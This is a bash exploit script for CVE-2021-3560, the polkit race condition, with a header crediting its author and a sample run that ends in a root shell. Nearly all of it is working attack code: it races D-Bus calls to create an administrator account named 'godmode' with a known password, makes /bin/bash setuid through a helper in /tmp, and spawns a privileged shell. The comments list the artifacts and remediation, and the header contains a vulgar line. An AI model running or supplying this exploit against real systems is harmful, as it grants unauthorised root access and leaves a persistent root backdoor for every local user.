#!/bin/bash

# Exploit by: Marshall Whittaker / oxagast
# oxagast@oxasploits.com
# Discovery by: Kevin Backhouse
# Polkit 0.113 - 0.118 LPE via Race Condition
# CVE-2021-3560
# https://oxasploits.com/posts/exploit-archive-partial-disclosure/
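# Note: the script does not clean up after itself. Afterwards you must manually
# remove the godmode user, run chmod a-s /bin/bash and rm /tmp/oneup.sh.
# Until that is done, /bin/bash stays setuid root for every local user on the host.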
# My neck, my back lick it lick my pussy and my crack.
#
# [marshall@jerkon CVE-2021-3560]$ ./polkit_godmode_0day.sh 
# Error org.freedesktop.DBus.Error.UnknownMethod: No such interface “org.freedesktop.Accounts.User” on object at path /org/freedesktop/Accounts/User
# ./polkit_godmode_0day.sh: line 13: kill: (197626) - No such process
# Error org.freedesktop.DBus.Error.UnknownMethod: No such interface “org.freedesktop.Accounts.User” on object at path /org/freedesktop/Accounts/User
# ./polkit_godmode_0day.sh: line 13: kill: (197630) - No such process
# Error org.freedesktop.DBus.Error.UnknownMethod: No such interface “org.freedesktop.Accounts.User” on object at path /org/freedesktop/Accounts/User
# Password: 
# [sudo] password for godmode: bash-5.1# 
# bash-5.1# id; whoami;uname -a;
# uid=1000(marshall) gid=1000(marshall) euid=0(root) egid=0(root) groups=0(root),998(wheel),1000(marshall)
# root
# Linux jerkon.oxagast.org 5.10.41-1-MANJARO #1 SMP PREEMPT Fri May 28 19:10:32 UTC 2021 x86_64 GNU/Linux
# bash-5.1# 

# sploit: drives the polkit race named in the file header (CVE-2021-3560) and
# then uses the resulting account to set the setuid bit on /bin/bash.
# Globals:   P (password hash) and ID (uid of the new account) are written as
#            globals; neither is declared local.
# Arguments: none
# Outputs:   D-Bus replies/errors and kill diagnostics go to the terminal.
#
# Host artifacts created by this block; none are removed here, so they are what
# to look for when triaging an affected machine:
#   - a local account named "godmode" in /etc/passwd
#   - a world-executable script at /tmp/oneup.sh
#   - /bin/bash with the setuid/setgid bits set (chmod a+s)
# Remediation: the header lists polkit 0.113 - 0.118 as affected, so a polkit
# release outside that range is the fix; restoring the three artifacts above is
# a separate, manual step.
function sploit {
  # SHA-256 crypt hash (openssl passwd -5) of the one-character password "a".
  P=$(openssl passwd -5 a);
  # Eleven passes ({0..10}). Each pass is timing dependent; the sample run in
  # the header shows several passes failing before one succeeds.
  for i in {0..10}; do
    # CreateUser request to accountsservice on the system bus; the dbus-send
    # client is backgrounded and killed 2 ms later, i.e. possibly while the
    # request is still being processed.
    # NOTE(review): presumably this early disconnect is the race the header
    # refers to, and int32:1 is the administrator account type that the later
    # sudo step relies on -- confirm both against the advisory.
    dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:godmode string:"gg" int32:1 & sleep 0.002s ; kill $!
    # uid of the godmode entry in /etc/passwd. Empty when the account does not
    # exist yet, which yields the bare ".../Accounts/User" object path seen in
    # the UnknownMethod errors quoted in the header.
    ID=$(cat /etc/passwd | grep godmode | cut -d ':' -f 3 | tr -d '\n');
    # SetPassword on that user object with the same launch-then-kill pattern.
    # The hash is passed on the command line, so it is visible in process
    # listings while dbus-send runs.
    dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$ID org.freedesktop.Accounts.User.SetPassword string:$P string:god & sleep 0.002s ; kill $!
  done;
  sleep 0.5;
  # Helper script at a fixed /tmp path: feeds the password "a" to sudo -S and
  # sets setuid/setgid on /bin/bash.
  echo 'echo a | sudo -S chmod a+s /bin/bash' > /tmp/oneup.sh;
  chmod a+x /tmp/oneup.sh;
  # socat supplies a pty so that su can prompt; the password "a" is written
  # after a one second delay and the helper runs as godmode.
  (sleep 1; echo a) | socat - EXEC:'su godmode -c /tmp/oneup.sh',pty;
  # -u tests the setuid bit; spawn is called only when the chmod took effect.
  if [ -u /bin/bash ]; then
    spawn;
  fi;
}
# spawn: starts /bin/bash in privileged mode when the binary carries the setuid
# bit, otherwise prints "error..." on stdout.
# Arguments: none
# Returns:   the exit status of the shell, or of echo on the error path.
# Note: -p keeps bash from dropping the effective uid, which is why a setuid
# /bin/bash left behind on a host is a standing root shell for any local user.
function spawn {
  if [ ! -u /bin/bash ]; then
    echo error...
    return
  fi
  /bin/bash -p
}

# Entry point: the script takes no arguments and runs sploit once.
sploit